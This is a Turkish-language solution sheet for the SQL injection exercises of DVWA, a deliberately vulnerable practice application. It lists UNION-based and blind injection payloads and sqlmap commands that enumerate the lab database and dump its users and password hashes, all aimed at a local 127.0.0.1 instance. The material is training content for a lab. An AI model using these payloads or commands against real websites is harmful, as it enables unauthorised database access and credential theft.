SQL İNJECTİON ÇÖZÜMLERİ
low Seviye
1' and 1=1 union select database(),user()#
1' and 1=1 union select null,table_name from information_schema.tables#
1' and 1=1 union select user,password from users#


Blind SQL İnjection

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'#
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
1 and 1=0 union select table_name,column_name from information_schema.columns where table_name=0x7573657273


SQLMAP Kullanarak Çözümü

=========================================================================================================================
Bağlı Tüm Databaseleri Bulma
python sqlmap.py -u 'http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=tnlrm1mnis7in6k9de0pljbjv0'  --string=Surname --dbs
=========================================================================================================================

python sqlmap.py -u 'http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=tnlrm1mnis7in6k9de0pljbjv0' --string=Surname -D dvwa --tables
python sqlmap.py -u 'http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=tnlrm1mnis7in6k9de0pljbjv0' --string=Surname -D dvwa -T users --columns
python sqlmap.py -u 'http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=tnlrm1mnis7in6k9de0pljbjv0' --string=Surname -D dvwa -T users -C user,first_name,last_name,password
python sqlmap.py -u 'http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=tnlrm1mnis7in6k9de0pljbjv0' --string=Surname -D dvwa -T users -C user,password 
python sqlmap.py -u 'http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=tnlrm1mnis7in6k9de0pljbjv0' --string=Surname -D dvwa -T users -C user,password --dump


